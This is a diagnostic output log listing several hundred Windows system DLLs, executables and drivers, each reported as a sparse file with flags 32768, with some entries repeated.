File "C:\WINDOWS\System32\psapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\user32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\gdi32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\advapi32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msvcrt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sechost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rpcrt4.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sspicli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\CRYPTBASE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BCRYPTPRIMITIVES.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\imm32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msctf.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shlwapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\combase.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shell32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\version.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\KERNEL.APPCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SHCore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\powrprof.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\profapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ole32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wintrust.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msasn1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\crypt32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\imagehlp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\comdlg32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wininet.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\oleaut32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\netapi32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ws2_32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\nsi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\userenv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mpr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winmm.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winspool.drv" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wkscli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\srvcli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\netutils.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINMMBASE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cfgmgr32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bcrypt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sfc_os.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\devobj.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptsp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rsaenh.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cscapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\uxtheme.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\iertutil.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\IPHLPAPI.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winnsi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winhttp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mswsock.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dnsapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\urlmon.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rasadhlp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FWPUCLNT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dwmapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dhcpcsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntmarta.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\clbcatq.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wtsapi32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winsta.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\propsys.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mssprxy.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\smss.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\csrss.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wininit.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winlogon.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\services.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\lsass.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\svchost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dwm.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WUDFHost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\WmiPrvSE.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wsock32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\setupapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rasapi32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rasman.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dpapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wscisvif.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wscapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ReAgent.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wdscore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DismApi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wbemdisp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbemcomn.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sxs.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wbemsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\fastprox.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\secur32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DHCPCSVC6.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\nlaapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\nlaapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NapiNSP.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pnrpnsp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winrnr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\fltLib.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wlanapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wlanapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\netshell.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\webio.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\samcli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\schannel.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSKEYPROTECT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntasn1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ncrypt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NCRYPTSSLP.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\gpapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptnet.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Wldap32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BITSPROXY.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\spoolsv.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\httpapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mqsvc.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shfolder.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\oleacc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msimg32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\oledlg.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\jsproxy.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\jsproxy.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wshqos.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WSHTCPIP.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wship6.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\hid.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cabinet.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mscoree.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\141950bbb0b97c04e39b8c1097eb38b4\System.ni.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dbghelp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dbgcore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSVCHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PRESENTATIONFONTCACHE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\explorer.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TASKHOSTW.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHINDEXER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\usp10.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\credui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pdh.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntdsapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DWrite.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WinTypes.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MMDevAPI.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Wpc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCP_WIN.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ucrtbase.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DATAEXCHANGE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d2d1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d3d11.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dcomp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dxgi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\EXPLORERFRAME.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bthprops.cpl" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BLUETOOTHAPIS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mscms.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\linkinfo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\edputil.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\POLICYMANAGER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSVCP110_WIN.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\xmllite.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ntshrui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\samlib.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\twinapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\actxprxy.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\devenum.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msdmo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msacm32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\avrt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\coml2.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWSCODECS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\THUMBCACHE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shdocvw.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mfplat.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RTWorkQ.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MFPERFHELPER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msvproc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\D3DCOMPILER_47.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\d3d9.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dxva2.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mf.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mfcore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ksuser.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\snmpapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\inetmib1.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wbemprox.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dsparse.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dsound.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\atlthunk.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\unsecapp.exe" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\MSCORSECIMPL.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\wmiutils.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WMINET_UTILS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rtutils.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msctfui.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DEVDISPITEMPROVIDER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wpdshext.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msiltcfg.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\opengl32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\glu32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ddraw.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\winusb.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\hhctrl.ocx" is sparse (flags = 32768)
File "C:\WINDOWS\System32\srclient.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\spp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vssapi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vsstrace.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msxml6.dll" is sparse (flags = 32768)
File "C:\WINDOWS\AppPatch\AcLayers.dll" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\DIASYMREADER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NTLMSHARED.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptdll.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\SysWOW64\ONEDRIVESETUP.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\credssp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\userinit.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\scecli.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\kerberos.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wdigest.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TSpkg.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pku2u.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\1394ohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\flpydisk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mspclock.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpiex.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\isapnp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpipmi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Locator.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\amdk8.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpipagr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\acpitime.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\luafv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mpsdrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\afd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\asyncmac.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\AGP440.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sdstor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ahcache.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\alg.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\amdppm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\umpass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\appid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rspndr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\irenum.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ioqos.sys" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srv2.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\atapi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pciide.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bowser.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BTHHFENUM.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\BthhfHid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bthmodem.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\volmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\udfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\uefi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cdfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\clfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cdrom.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\circlass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mup.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\CmBatt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\cng.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\CNGHWASSIST.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dllhost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\condrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dam.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dfsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\disk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dmvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\drmkaud.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\serial.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\dxgkrnl.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tcpip.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORCLASS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\errdev.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fileinfo.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FXSSVC.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SerCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SpbCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fcvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fdc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FILECRYPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vmstorfl.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ipfltdrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FILETRACE.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fltMgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\monitor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\FSDEPENDS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\STORQOSFLT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\fvevol.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GAGP30KX.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndisuio.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSGPIOCLX.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rasl2tp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidbatt.sys" is sparse (flags = 32768)
